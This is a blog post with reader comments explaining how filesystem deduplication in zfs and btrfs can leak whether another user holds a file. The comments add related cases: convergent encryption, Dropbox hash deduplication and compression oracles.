mjg59 | Filesystem deduplication is a sidechannel

First off - nothing I'm going to talk about in this post is novel or overly surprising, I just haven't found a clear writeup of it before. I'm not criticising any design decisions or claiming this is an important issue, just raising something that people might otherwise be unaware of.

With that out of the way: Automatic deduplication of data is a feature of modern filesystems like zfs and btrfs. It takes two forms - inline, where the filesystem detects that data being written to disk is identical to data that already exists on disk and simply references the existing copy rather than, and offline, where tooling retroactively identifies duplicated data and removes the duplicate copies (zfs supports inline deduplication, btrfs only currently supports offline). In a world where disks end up with multiple copies of cloud or container images, deduplication can free up significant amounts of disk space.

What's the security implication? The problem is that deduplication doesn't recognise ownership - if two users have copies of the same file, only one copy of the file will be stored[1]. So, if user a stores a file, the amount of free space will decrease. If user b stores another copy of the same file, the amount of free space will remain the same. If user b is able to check how much free space is available, user b can determine whether the file already exists.

This doesn't seem like a huge deal in most cases, but it is a violation of expected behaviour (if user b doesn't have permission to read user a's files, user b shouldn't be able to determine whether user a has a specific file). But we can come up with some convoluted cases where it becomes more relevant, such as law enforcement gaining unprivileged access to a system and then being able to demonstrate that a specific file already exists on that system. Perhaps more interestingly, it's been demonstrated that free space isn't the only sidechannel exposed by deduplication - deduplication has an impact on access timing, and can be used to infer the existence of data across virtual machine boundaries.

As I said, this is almost certainly not something that matters in most real world scenarios. But with so much discussion of CPU sidechannels over the past couple of years, it's interesting to think about what other features also end up leaking information in ways that may not be obvious.

(Edit to add: deduplication isn't enabled on zfs by default and is explicitly triggered on btrfs, so unless it's something you've enabled then this isn't something that affects you)

[1] Deduplication is usually done at the block level rather than the file level, but given zfs's support for variable sized blocks, identical files should be deduplicated even if they're smaller than the maximum record size

Flat | Top-Level Comments Only

From:

jsgf

This came up in Tahoe's use of convergent encryption which allows you do confirm some missing information. For example, if you know someone has a PDF template of a form which you know everything about except an SSN field, you can generate forms with all the SSNs and look for collisions, thereby confirming their SSN.

In this case, you could perform the same attack but look for dedups.

Edited (typos) Date: 2020-07-28 01:32 am (UTC)

From: (Anonymous)

It's fractionally worse than that: if there is a file that extends across multiple de-duplication blocks and some part of it changes, then you can confirm it's existence without having to figure out the changing bit by detecting the de-duplication of one of the unchanging blocks.

So, using your example, if the SSN is in the last few bytes of a PDF containing a couple of big images that make it large enough to span multiple de-duplication blocks, you can infer it's existence by detecting the de-duplication of the first block of the PDF.

Similar behaviour was noticeable with Dropbox early on. If you put a large file into the local folder, it would sometimes sync with the server far too quickly to actually be uploading it — but only if it was the kind of file that might plausibly be possessed by other users... large eBook PDFs, for example.

Specifically, there was a tool called Dropship to "teleport" files into your own account with just the right hashes. This was of course quickly abused by people that don't respect copyright laws, as you could share a movie in like 10KB worth of hashes without ever violating copyright law as far as Dropbox was concerned. Very thankful they tried to Streisand it off the internet, it's a super interesting if usually impractical attack vector and it'd have been a shame to miss it.

I've been thinking about compression oracle attacks for a while. I first learned about them when many people did: https://en.wikipedia.org/wiki/CRIME. I think they are much more common than we realize, because there's so many layers involved everywhere that it's easy to nest compression inside of encryption. For example, it exists in XMPP: https://issues.prosody.im/645. This is another example of that. In fact, here, there's no encryption involved but the compression *still gives an oracle*.

- kousu

Hardly a sidechannel, it's a straight-up direct link between bits from one security context into another. Why did anyone think this was acceptable to do across user boundaries? How much storage is even saved by this nonsense?

AFAIK no unpriv'd user can do this, you need to have read/write access to both files before you can dedupe/reflink one to the other.

So while an admin needs to be aware of this, it's a conscious choice to link two files and expose this information, at least on the Linux filesystems being discussed.

mjg59

No, if you have dedup enabled on ZFS it'll happen automatically.

Your employer, Google, already sends automated reports to law enforcement when its scanners see certain files on GDrive or being emailed through a GMail account.

They already have so much unfettered access to a persons data through automatic reports, backdoors, and if the government chooses to go that route, a plain old subpoena.

A file system quirk that might hint that something is there if you already have access to the file system is a strange concern at that point.

Matthew Garrett

Filesystem deduplication is a sidechannel

Filesystem deduplication is a sidechannel

Tahoe LAFS information confirmation attack

Re: Tahoe LAFS information confirmation attack

no subject

no subject

no subject

side?

Re: side?

Re: side?

Google already notifies law enforcement automatically

Profile

About Matthew

Page Summary

Expand Cut Tags